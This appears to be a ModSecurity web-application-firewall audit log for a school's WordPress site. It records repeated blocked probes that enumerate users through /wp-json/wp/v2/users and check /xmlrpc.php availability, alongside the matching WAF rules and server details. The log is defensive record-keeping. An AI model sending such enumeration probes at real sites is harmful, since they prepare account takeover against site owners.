userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463937879018 4959 (- - -) Stopwatch2: 1746463937879018 4959; combined=3993, p1=515, p2=3259, p3=29, p4=32, p5=93, sr=89, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f043a32a-Z-- --298f6a71-A-- [05/May/2025:23:52:20 +0700] aBjsxE2V_h1VFAgsfgaDtAAAAAk 103.236.140.4 42380 103.236.140.4 8181 --298f6a71-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.82 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --298f6a71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --298f6a71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746463940449627 2480 (- - -) Stopwatch2: 1746463940449627 2480; combined=1439, p1=445, p2=960, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --298f6a71-Z-- --3a9db936-A-- [05/May/2025:23:52:23 +0700] aBjsxwRwKNFSM6B7_LamAQAAAJA 103.236.140.4 42416 103.236.140.4 8181 --3a9db936-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.178.82 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.178.82 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3a9db936-C-- demo.sayHello --3a9db936-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a9db936-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746463943605482 6100 (- - -) Stopwatch2: 1746463943605482 6100; combined=4844, p1=630, p2=3966, p3=39, p4=43, p5=98, sr=118, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a9db936-Z-- --2e7daa20-A-- [05/May/2025:23:53:20 +0700] aBjtAIZWvR7-42f6JrASggAAAMo 103.236.140.4 42906 103.236.140.4 8181 --2e7daa20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2e7daa20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e7daa20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464000039905 2910 (- - -) Stopwatch2: 1746464000039905 2910; combined=1511, p1=489, p2=986, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e7daa20-Z-- --c006bf25-A-- [05/May/2025:23:53:25 +0700] aBjtBYZWvR7-42f6JrASiQAAANc 103.236.140.4 42966 103.236.140.4 8181 --c006bf25-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.207 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c006bf25-C-- demo.sayHello --c006bf25-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c006bf25-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464005762059 5838 (- - -) Stopwatch2: 1746464005762059 5838; combined=4329, p1=532, p2=3560, p3=39, p4=35, p5=96, sr=74, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c006bf25-Z-- --156dbe33-A-- [05/May/2025:23:54:22 +0700] aBjtPoZWvR7-42f6JrASnAAAAMo 103.236.140.4 43348 103.236.140.4 8181 --156dbe33-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.69 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --156dbe33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --156dbe33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464062285208 2794 (- - -) Stopwatch2: 1746464062285208 2794; combined=1501, p1=451, p2=1014, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --156dbe33-Z-- --3ae17f5f-A-- [05/May/2025:23:54:25 +0700] aBjtQQRwKNFSM6B7_LamRgAAAIM 103.236.140.4 43384 103.236.140.4 8181 --3ae17f5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.69 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.69 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3ae17f5f-C-- demo.sayHello --3ae17f5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ae17f5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464065164709 5124 (- - -) Stopwatch2: 1746464065164709 5124; combined=4122, p1=535, p2=3365, p3=32, p4=35, p5=92, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ae17f5f-Z-- --d3e31765-A-- [05/May/2025:23:54:28 +0700] aBjtRPZJDMuQndL03JNkXQAAAEg 103.236.140.4 43416 103.236.140.4 8181 --d3e31765-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d3e31765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3e31765-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464068639397 3252 (- - -) Stopwatch2: 1746464068639397 3252; combined=1403, p1=483, p2=890, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3e31765-Z-- --835b117a-A-- [05/May/2025:23:54:31 +0700] aBjtR4ZWvR7-42f6JrASpQAAAMk 103.236.140.4 43436 103.236.140.4 8181 --835b117a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --835b117a-C-- demo.sayHello --835b117a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --835b117a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464071407358 5581 (- - -) Stopwatch2: 1746464071407358 5581; combined=4219, p1=530, p2=3446, p3=30, p4=34, p5=105, sr=72, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --835b117a-Z-- --f676dd4c-A-- [05/May/2025:23:59:30 +0700] aBjucgRwKNFSM6B7_LamuwAAAII 103.236.140.4 45790 103.236.140.4 8181 --f676dd4c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.17 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f676dd4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f676dd4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464370222470 2640 (- - -) Stopwatch2: 1746464370222470 2640; combined=1416, p1=463, p2=919, p3=0, p4=0, p5=33, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f676dd4c-Z-- --9204a72f-A-- [05/May/2025:23:59:33 +0700] aBjudQRwKNFSM6B7_LamvgAAAJA 103.236.140.4 45826 103.236.140.4 8181 --9204a72f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.92.17 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.92.17 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9204a72f-C-- demo.sayHello --9204a72f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9204a72f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464373278870 5706 (- - -) Stopwatch2: 1746464373278870 5706; combined=4271, p1=539, p2=3402, p3=32, p4=35, p5=146, sr=73, sw=117, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9204a72f-Z-- --10855341-A-- [06/May/2025:00:03:23 +0700] aBjvW_ZJDMuQndL03JNlfwAAAEk 103.236.140.4 47962 103.236.140.4 8181 --10855341-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --10855341-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10855341-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746464603085235 3386 (- - -) Stopwatch2: 1746464603085235 3386; combined=1471, p1=482, p2=957, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10855341-Z-- --e7f02a2a-A-- [06/May/2025:00:03:26 +0700] aBjvXvZJDMuQndL03JNlgAAAAFA 103.236.140.4 47990 103.236.140.4 8181 --e7f02a2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e7f02a2a-C-- demo.sayHello --e7f02a2a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7f02a2a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746464606292265 5319 (- - -) Stopwatch2: 1746464606292265 5319; combined=4258, p1=517, p2=3487, p3=34, p4=36, p5=107, sr=75, sw=77, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7f02a2a-Z-- --b562fd2d-A-- [06/May/2025:00:11:13 +0700] aBjxMU2V_h1VFAgsfgaGZgAAAAE 103.236.140.4 51570 103.236.140.4 8181 --b562fd2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b562fd2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b562fd2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465073231180 2178 (- - -) Stopwatch2: 1746465073231180 2178; combined=1204, p1=403, p2=770, p3=0, p4=0, p5=30, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b562fd2d-Z-- --e553926e-A-- [06/May/2025:00:11:15 +0700] aBjxM02V_h1VFAgsfgaGbAAAABA 103.236.140.4 51594 103.236.140.4 8181 --e553926e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.158 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e553926e-C-- demo.sayHello --e553926e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e553926e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465075968272 5729 (- - -) Stopwatch2: 1746465075968272 5729; combined=4230, p1=513, p2=3486, p3=33, p4=34, p5=97, sr=73, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e553926e-Z-- --fe6a5842-A-- [06/May/2025:00:11:50 +0700] aBjxVoZWvR7-42f6JrAUjAAAAM4 103.236.140.4 51912 103.236.140.4 8181 --fe6a5842-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fe6a5842-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe6a5842-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746465110779036 2769 (- - -) Stopwatch2: 1746465110779036 2769; combined=1174, p1=385, p2=755, p3=0, p4=0, p5=33, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe6a5842-Z-- --ddee590b-A-- [06/May/2025:00:11:53 +0700] aBjxWU2V_h1VFAgsfgaGpAAAAAk 103.236.140.4 51936 103.236.140.4 8181 --ddee590b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.204.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.204.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ddee590b-C-- demo.sayHello --ddee590b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ddee590b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746465113498061 5228 (- - -) Stopwatch2: 1746465113498061 5228; combined=4249, p1=514, p2=3516, p3=33, p4=34, p5=91, sr=72, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
